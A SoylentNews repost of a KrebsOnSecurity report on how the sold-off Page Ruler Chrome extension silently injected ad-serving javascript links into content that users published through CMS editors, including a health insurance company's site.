The Case for Limiting Your Browser Extensions
upstart writes in with an IRC submission for Bytram:
The Case for Limiting Your Browser Extensions:
The health insurance site was compromised after an employee at the company edited content on the site while using a Web browser equipped with a once-benign but now-compromised extension which quietly injected code into the page.
The extension in question was Page Ruler, a Chrome addition with some 400,000 downloads. Page Ruler lets users measure the inch/pixel width of images and other objects on a Web page. But the extension was sold by the original developer a few years back, and for some reason it's still available from the Google Chrome store despite multiple recent reports from people blaming it for spreading malicious code.
How did a browser extension lead to a malicious link being added to the health insurance company Web site? This compromised extension tries to determine if the person using it is typing content into specific Web forms, such as a blog post editing system like WordPress or Joomla.
In that case, the extension silently adds a request for a javascript link to the end of whatever the user types and saves on the page. When that altered HTML content is saved and published to the Web, the hidden javascript code causes a visitor's browser to display ads under certain conditions.
[...] Contacted by KrebsOnSecurity, Page Ruler's original developer Peter Newnham confirmed he sold his extension to MonetizUs in 2017.
"They didn't say what they were going to do with it but I assumed they were going to try to monetize it somehow, probably with the scripts their website mentions," Newnham said.
"I could have probably made a lot more running ad code myself but I didn't want the hassle of managing all of that and Google seemed to be making noises at the time about cracking down on that kind of behaviour so the one off payment suited me fine," Newnham said. "Especially as I hadn't updated the extension for about 3 years and work and family life meant I was unlikely to do anything with it in the future as well."
Monetizus did not respond to requests for comment.
Read more of this story at SoylentNews.